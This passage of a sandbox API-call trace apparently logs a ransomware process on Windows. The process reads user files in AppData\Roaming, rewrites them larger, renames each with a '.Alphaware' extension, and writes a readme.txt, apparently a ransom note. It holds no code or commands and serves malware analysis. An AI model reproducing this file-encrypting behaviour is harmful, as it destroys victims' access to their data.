lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.210] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.210] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.211] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.211] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.211] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.212] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.212] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.212] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.213] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.213] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.213] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.213] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.214] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.214] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea18, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea18*=0x1000, lpOverlapped=0x0) returned 1 [0090.214] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23e9f8*=0xa0, lpOverlapped=0x0) returned 1 [0090.214] CloseHandle (hObject=0x250) returned 1 [0090.217] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv", lpFilePart=0x0) returned 0x39 [0090.218] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv.Alphaware", nBufferLength=0x105, lpBuffer=0x23e710, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv.Alphaware", lpFilePart=0x0) returned 0x43 [0090.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.218] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\0kv--h785b9bkhr7x8.mkv"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f5de560, ftCreationTime.dwHighDateTime=0x1d96b60, ftLastAccessTime.dwLowDateTime=0xb152f8c0, ftLastAccessTime.dwHighDateTime=0x1d9705b, ftLastWriteTime.dwLowDateTime=0x87f78f80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x190a0)) returned 1 [0090.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.218] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\0kv--h785b9bkhr7x8.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\0kv--h785b9bkhr7x8.mkv.alphaware")) returned 1 [0090.220] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\readme.txt", nBufferLength=0x105, lpBuffer=0x23e530, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\readme.txt", lpFilePart=0x0) returned 0x2d [0090.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0090.220] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.221] GetFileType (hFile=0x250) returned 0x1 [0090.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0090.221] GetFileType (hFile=0x250) returned 0x1 [0090.222] WriteFile (in: hFile=0x250, lpBuffer=0x23f0560*, nNumberOfBytesToWrite=0x49d, lpNumberOfBytesWritten=0x23eae8, lpOverlapped=0x0 | out: lpBuffer=0x23f0560*, lpNumberOfBytesWritten=0x23eae8*=0x49d, lpOverlapped=0x0) returned 1 [0090.223] CloseHandle (hObject=0x250) returned 1 [0090.230] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2cvjqDL8AbrH.rtf", nBufferLength=0x105, lpBuffer=0x23e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2cvjqDL8AbrH.rtf", lpFilePart=0x0) returned 0x33 [0090.230] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2cvjqDL8AbrH.rtf", dwFileAttributes=0x80) returned 1 [0090.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.231] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2cvjqDL8AbrH.rtf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2cvjqdl8abrh.rtf"), fInfoLevelId=0x0, lpFileInformation=0x23f1e78 | out: lpFileInformation=0x23f1e78*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x45e0b60, ftCreationTime.dwHighDateTime=0x1d9753c, ftLastAccessTime.dwLowDateTime=0x746b5210, ftLastAccessTime.dwHighDateTime=0x1d975ae, ftLastWriteTime.dwLowDateTime=0x746b5210, ftLastWriteTime.dwHighDateTime=0x1d975ae, nFileSizeHigh=0x0, nFileSizeLow=0x1555b)) returned 1 [0090.231] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.231] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2cvjqDL8AbrH.rtf", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2cvjqDL8AbrH.rtf", lpFilePart=0x0) returned 0x33 [0090.231] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.231] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2cvjqDL8AbrH.rtf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2cvjqdl8abrh.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.232] GetFileType (hFile=0x250) returned 0x1 [0090.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.232] GetFileType (hFile=0x250) returned 0x1 [0090.232] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x1555b [0090.232] ReadFile (in: hFile=0x250, lpBuffer=0x127fc8a8, nNumberOfBytesToRead=0x1555b, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x127fc8a8*, lpNumberOfBytesRead=0x23eb38*=0x1555b, lpOverlapped=0x0) returned 1 [0090.238] CloseHandle (hObject=0x250) returned 1 [0090.342] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.342] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2cvjqDL8AbrH.rtf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2cvjqdl8abrh.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.348] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.348] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2cvjqDL8AbrH.rtf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2cvjqdl8abrh.rtf"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45e0b60, ftCreationTime.dwHighDateTime=0x1d9753c, ftLastAccessTime.dwLowDateTime=0x746b5210, ftLastAccessTime.dwHighDateTime=0x1d975ae, ftLastWriteTime.dwLowDateTime=0x880cfbe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1c7f4)) returned 1 [0090.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.348] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2cvjqDL8AbrH.rtf" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2cvjqdl8abrh.rtf"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2cvjqDL8AbrH.rtf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2cvjqdl8abrh.rtf.alphaware")) returned 1 [0090.350] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2XrQR lLdHFDJW8qX.jpg", dwFileAttributes=0x80) returned 1 [0090.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.350] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2XrQR lLdHFDJW8qX.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2xrqr lldhfdjw8qx.jpg"), fInfoLevelId=0x0, lpFileInformation=0x246fc88 | out: lpFileInformation=0x246fc88*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe439c690, ftCreationTime.dwHighDateTime=0x1d97134, ftLastAccessTime.dwLowDateTime=0x259485f0, ftLastAccessTime.dwHighDateTime=0x1d973d1, ftLastWriteTime.dwLowDateTime=0x259485f0, ftLastWriteTime.dwHighDateTime=0x1d973d1, nFileSizeHigh=0x0, nFileSizeLow=0x13f6f)) returned 1 [0090.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.350] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.350] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2XrQR lLdHFDJW8qX.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2xrqr lldhfdjw8qx.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.350] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.350] ReadFile (in: hFile=0x250, lpBuffer=0x246ff20, nNumberOfBytesToRead=0x13f6f, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x246ff20*, lpNumberOfBytesRead=0x23eb38*=0x13f6f, lpOverlapped=0x0) returned 1 [0090.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.386] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2XrQR lLdHFDJW8qX.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2xrqr lldhfdjw8qx.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.392] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2XrQR lLdHFDJW8qX.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2xrqr lldhfdjw8qx.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe439c690, ftCreationTime.dwHighDateTime=0x1d97134, ftLastAccessTime.dwLowDateTime=0x259485f0, ftLastAccessTime.dwHighDateTime=0x1d973d1, ftLastWriteTime.dwLowDateTime=0x88142000, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1aab4)) returned 1 [0090.392] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.392] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2XrQR lLdHFDJW8qX.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2xrqr lldhfdjw8qx.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\2XrQR lLdHFDJW8qX.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\2xrqr lldhfdjw8qx.jpg.alphaware")) returned 1 [0090.399] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\7ord0oMkDdqdZwcFM7PM.mkv", dwFileAttributes=0x80) returned 1 [0090.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.399] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\7ord0oMkDdqdZwcFM7PM.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\7ord0omkddqdzwcfm7pm.mkv"), fInfoLevelId=0x0, lpFileInformation=0x253d750 | out: lpFileInformation=0x253d750*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe5278740, ftCreationTime.dwHighDateTime=0x1d96847, ftLastAccessTime.dwLowDateTime=0x49b29620, ftLastAccessTime.dwHighDateTime=0x1d96c7e, ftLastWriteTime.dwLowDateTime=0x49b29620, ftLastWriteTime.dwHighDateTime=0x1d96c7e, nFileSizeHigh=0x0, nFileSizeLow=0x3b8a)) returned 1 [0090.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.399] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.400] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\7ord0oMkDdqdZwcFM7PM.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\7ord0omkddqdzwcfm7pm.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.400] ReadFile (in: hFile=0x250, lpBuffer=0x253d9f8, nNumberOfBytesToRead=0x3b8a, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x253d9f8*, lpNumberOfBytesRead=0x23eb38*=0x3b8a, lpOverlapped=0x0) returned 1 [0090.438] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.438] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\7ord0oMkDdqdZwcFM7PM.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\7ord0omkddqdzwcfm7pm.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.439] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.442] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\7ord0oMkDdqdZwcFM7PM.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\7ord0omkddqdzwcfm7pm.mkv"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5278740, ftCreationTime.dwHighDateTime=0x1d96847, ftLastAccessTime.dwLowDateTime=0x49b29620, ftLastAccessTime.dwHighDateTime=0x1d96c7e, ftLastWriteTime.dwLowDateTime=0x881b4420, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5034)) returned 1 [0090.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.442] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\7ord0oMkDdqdZwcFM7PM.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\7ord0omkddqdzwcfm7pm.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\7ord0oMkDdqdZwcFM7PM.mkv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\7ord0omkddqdzwcfm7pm.mkv.alphaware")) returned 1 [0090.443] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\AcoFPdLUL2Wyq3ljkzb.jpg", dwFileAttributes=0x80) returned 1 [0090.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.444] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\AcoFPdLUL2Wyq3ljkzb.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\acofpdlul2wyq3ljkzb.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23e23e0 | out: lpFileInformation=0x23e23e0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x85a40bb0, ftCreationTime.dwHighDateTime=0x1d966d8, ftLastAccessTime.dwLowDateTime=0xe2e64df0, ftLastAccessTime.dwHighDateTime=0x1d96b75, ftLastWriteTime.dwLowDateTime=0xe2e64df0, ftLastWriteTime.dwHighDateTime=0x1d96b75, nFileSizeHigh=0x0, nFileSizeLow=0x1453f)) returned 1 [0090.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.444] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.444] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\AcoFPdLUL2Wyq3ljkzb.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\acofpdlul2wyq3ljkzb.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.444] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.444] ReadFile (in: hFile=0x250, lpBuffer=0x23e2678, nNumberOfBytesToRead=0x1453f, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23e2678*, lpNumberOfBytesRead=0x23eb38*=0x1453f, lpOverlapped=0x0) returned 1 [0090.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.485] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\AcoFPdLUL2Wyq3ljkzb.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\acofpdlul2wyq3ljkzb.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.494] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\AcoFPdLUL2Wyq3ljkzb.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\acofpdlul2wyq3ljkzb.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85a40bb0, ftCreationTime.dwHighDateTime=0x1d966d8, ftLastAccessTime.dwLowDateTime=0xe2e64df0, ftLastAccessTime.dwHighDateTime=0x1d96b75, ftLastWriteTime.dwLowDateTime=0x88226840, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1b274)) returned 1 [0090.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.494] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\AcoFPdLUL2Wyq3ljkzb.jpg" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\acofpdlul2wyq3ljkzb.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\AcoFPdLUL2Wyq3ljkzb.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\acofpdlul2wyq3ljkzb.jpg.alphaware")) returned 1 [0090.496] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bNR8T.csv", dwFileAttributes=0x80) returned 1 [0090.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.496] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bNR8T.csv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bnr8t.csv"), fInfoLevelId=0x0, lpFileInformation=0x23d83e8 | out: lpFileInformation=0x23d83e8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xc3abec40, ftCreationTime.dwHighDateTime=0x1d96663, ftLastAccessTime.dwLowDateTime=0xe45c7b40, ftLastAccessTime.dwHighDateTime=0x1d96a59, ftLastWriteTime.dwLowDateTime=0xe45c7b40, ftLastWriteTime.dwHighDateTime=0x1d96a59, nFileSizeHigh=0x0, nFileSizeLow=0xcd9d)) returned 1 [0090.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.496] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bNR8T.csv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bnr8t.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.496] ReadFile (in: hFile=0x250, lpBuffer=0x23f8888, nNumberOfBytesToRead=0xcd9d, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x23f8888*, lpNumberOfBytesRead=0x23eb38*=0xcd9d, lpOverlapped=0x0) returned 1 [0090.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.522] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bNR8T.csv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bnr8t.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.524] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.527] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0090.527] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bNR8T.csv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bnr8t.csv"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3abec40, ftCreationTime.dwHighDateTime=0x1d96663, ftLastAccessTime.dwLowDateTime=0xe45c7b40, ftLastAccessTime.dwHighDateTime=0x1d96a59, ftLastWriteTime.dwLowDateTime=0x88272b00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x112f4)) returned 1 [0090.527] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0090.527] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bNR8T.csv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bnr8t.csv"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bNR8T.csv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bnr8t.csv.alphaware")) returned 1 [0090.528] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\EGL9Rx1KXSqWh.mkv", dwFileAttributes=0x80) returned 1 